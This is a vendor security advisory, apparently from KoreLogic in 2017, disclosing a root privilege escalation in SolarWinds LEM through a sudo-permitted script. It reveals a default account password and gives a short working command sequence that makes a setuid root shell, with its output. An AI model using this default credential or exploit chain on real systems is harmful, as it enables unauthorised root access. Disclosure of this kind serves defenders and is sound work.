Solarwinds LEM Privilege Escalation via Sudo Script Abuse

Vulnerability Description

An attacker can abuse functionality provided by a script which may be run with root privilege in order to elevate privilege.

Technical Description

Should an attacker gain access to the SSH console for the cmc user, root access to the underlying operating system can be achieved. The default password for the cmc user is “password”.

The cmc account can run certain script files with root privilege. Listed below:

cmc     ALL=(ALL) NOPASSWD:
/usr/local/contego/scripts/activate.pl,
/usr/local/contego/scripts/apply_hotfix,
/usr/local/contego/scripts/cleantemp.pl,
/usr/local/contego/scripts/contego-archive,
/usr/local/contego/scripts/contego-backup,
/usr/local/contego/scripts/contego-logbackup,
/usr/local/contego/scripts/debugdump.pl,
/usr/local/contego/scripts/disable_ipv6.sh,
/usr/local/contego/scripts/exportsyslog.pl,
/usr/local/contego/scripts/hostname.sh,
/usr/local/contego/scripts/ipchains_restore.sh,
/usr/local/contego/scripts/managerReset.pl,
/usr/local/contego/scripts/mountshare.sh,
/usr/local/contego/scripts/mountsolr.pl,
/usr/local/contego/scripts/netconfig.sh,
/usr/local/contego/scripts/opseccontrol.sh,
/usr/local/contego/scripts/rcc.pl,
/usr/local/contego/scripts/setupCert.sh,
/usr/local/contego/scripts/sim2lem.pl,
/usr/local/contego/scripts/snortcontrol.sh,
/usr/local/contego/scripts/sshcontrol.sh,
/usr/local/contego/scripts/swi_login_update.pl,
/usr/local/contego/scripts/timecontrol.sh,
/usr/local/contego/scripts/upgrade.pl,
/usr/local/contego/scripts/upgrade21.sh,
/usr/local/contego/scripts/upgrade_bootloader.sh,
/usr/local/contego/scripts/recovery.py,
/sbin/shutdown,
/usr/bin/lem/lynx-admin-ui

One script, upgrade21.sh allows the user to change ownership and permission bits for an arbitrary file. This can be abused to elevate privilege to root.

cmc@swi-lem:/usr/local/contego/scripts$ cp /bin/dash /tmp/koresh
cmc@swi-lem:/usr/local/contego/scripts$ sudo ./upgrade21.sh setperms /tmp/koresh root root 4755
sudo: unable to resolve host swi-lem
cmc@swi-lem:/usr/local/contego/scripts$ /tmp/koresh
# id
uid=1001(cmc) gid=1000(trigeo) euid=0(root) groups=0(root),4(adm),24(cdrom),25(floppy),104(postgres),105(snort),1000(trigeo),1002(dbadmin)

Mitigation and Remediation Recommendation

The vendor has released a Hotfix to remediate this vulnerability. Hotfix and installation instructions are available at:

https://thwack.solarwinds.com/thread/111223

Credit

This vulnerability was discovered by Hank Leininger and Matt Bergin (@thatguylevel) of KoreLogic, Inc.

Proof of Concept

See 3. Technical Description

The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt